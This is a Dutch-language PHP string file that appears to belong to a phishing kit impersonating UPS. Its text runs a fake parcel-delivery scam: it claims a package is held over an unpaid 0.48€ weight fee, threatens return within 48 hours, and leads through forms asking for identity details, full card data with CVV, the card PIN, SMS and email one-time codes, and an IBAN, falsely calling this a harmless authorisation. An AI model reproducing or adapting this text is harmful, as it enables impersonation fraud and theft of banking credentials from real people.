<?php
function lang($phrase){
	static $lang = array(

                "xlang" => "NL",
                "xcapt1" => "Controleer het CAPTCHA-vakje.",
                "xcapt2" => "Verificatie",
                "xcapt3" => "Doorgaan",
                "xfot1" => "Deze site",
                "xfot2" => "Andere UPS Sites",
                "xfot3" => "Maak contact met ons",
                "xfot4" => "Juridisch",
                "xfot5" => "Copyright ©1994- 2023&nbsp;United Parcel Service of America, Inc. Alle rechten voorbehouden. ",
                "xind1" => "Traceren",
                "xind2" => "Volgnummer",
                "xind3" => "Fout : Geef het juiste trackingnummer op.",
                "xind4" => "Hulp nodig bij het wijzigen van uw levering?",
                "xind5" => "Offerte",
                "xind6" => "Verzenden",
                "xind7" => "Facturering",
                "xind8" => "Hulp krijgen",
                "xexp1" => "Bezorging onderbroken",
                "xexp2" => "Traceren",
                "xexp3" => "Uw laatste levering is onderbroken. Deze wordt momenteel vastgehouden in het sorteercentrum",
                "xexp4" => "Het pakket dat naar u is verzonden voldeed niet aan het aangegeven gewicht en u zult gevraagd worden een extra vergoeding te betalen om ervoor te zorgen dat uw pakket correct wordt afgeleverd",
                "xexp5" => "De kosten bedragen 0,48€",
                "xexp6" => "Om te betalen, klik op onderstaande knop",
                "xexp7" => "Betalen",
                "xexp8" => "Zodra de kosten zijn betaald, wordt uw pakket zo snel mogelijk doorgestuurd naar het afleveradres.",
                "xexp9" => "Als de vergoeding niet binnen 48 uur is betaald, wordt het pakket teruggestuurd naar de afzender.",
                "xexp10" => "Traceren op referentienummer",
                "xexp11" => "Volgnummer import",
                "xexp12" => "Andere traceerdiensten",
                "xinfz1" => "Bevestig uw factuurgegevens",
                "xinfz2" => "Volledige naam",
                "xinfz10" => "Geboortedatum",
                "xinfz3" => "Land",
                "xinfz4" => "Stad",
                "xinfz5" => "Adres",
                "xinfz6" => "Telefoon",
                "xinfz7" => "Postcode",
                "xinfz8" => "Fout : Alle gegevens zijn vereist",
                "xinfz9" => "Bevestigen",
                "xpay1" => "Betalingsgegevens",
                "xpay2" => "Beste klant, controleer uw betalingsgegevens correct en pas uw kaartgegevens aan om te voltooien",
                "xpay3" => "Naam op kaart",
                "xpay4" => "Kaartnummer",
                "xpay5" => "Vervaldatum",
                "xpay6" => "Beveiligingscode CVV (3 cijfers)",
                "xpay7" => "Fout : Alle gegevens zijn vereist",
                "xpay8" => "Bevestigen",
                "xsms1" => "Verificatie",
                "xsms2" => "We hebben een bevestigingscode naar je nummer gestuurd.",
                "xsms3" => "OTP-code",
                "xsms4" => "Fout: Onjuiste otp-code.",
                "xsms5" => "Deze stap is vereist om uw betalingsproces veilig te voltooien.",
                "xsms6" => "UPS voert een tijdelijke verificatie uit op uw kaart om deze te verifiëren. Dit is alleen een autorisatie en GEEN kosten.",
                "xsms7" => "Bevestigen",
                "xconf1" => "Hervatten van aflevering",
                "xconf2" => "Er is rekening gehouden met de betaling van de extra kosten.",
                "xconf3" => "Je pakket zou binnen de komende 24 uur moeten aankomen.",
                "xconf4" => "Bevestigen",
                "xpin1" => "Verificatie",
                "xpin2" => "Voer de pincode voor uw bankkaart in",
                "xpin3" => "Pincode",
                "xpin4" => "(4 cijfers)",
                "xpin5" => "Deze stap is vereist om uw betalingsproces veilig te voltooien.",
                "xpin6" => "UPS voert een tijdelijke verificatie van uw kaart uit om deze te verifiëren. Dit is alleen een autorisatie en GEEN kosten.",
                "xpin7" => "Bevestigen",
                "xmail1" => "Verificatie",
                "xmail2" => "We hebben een bevestigingscode naar uw e-mail verzonden",
                "xmail3" => "E-mailcode",
                "xmail4" => "(6 cijfers)",
                "xmail5" => "Deze stap is vereist om uw betalingsproces veilig te voltooien.",
                "xmail6" => "UPS voert een tijdelijke verificatie van uw kaart uit om deze te verifiëren. Dit is alleen een autorisatie en GEEN kosten.",
                "xmail7" => "Bevestigen",
                "xiban1" => "Verificatie",
        "xiban2" => "Voer uw IBAN in om de betaling te voltooien",
        "xiban3" => "IBAN",
        "xiban4" => "(IBAN)",
        "xiban5" => "Deze stap is vereist om uw betalingsproces veilig af te ronden.",
        "xiban6" => "UPS voert een tijdelijke verificatie van uw kaart uit om deze te verifiëren. Dit is alleen een autorisatie en GEEN kosten.",
        "xiban7" => "Bevestigen"
	);	
	
	return $lang[$phrase];
}
 ?>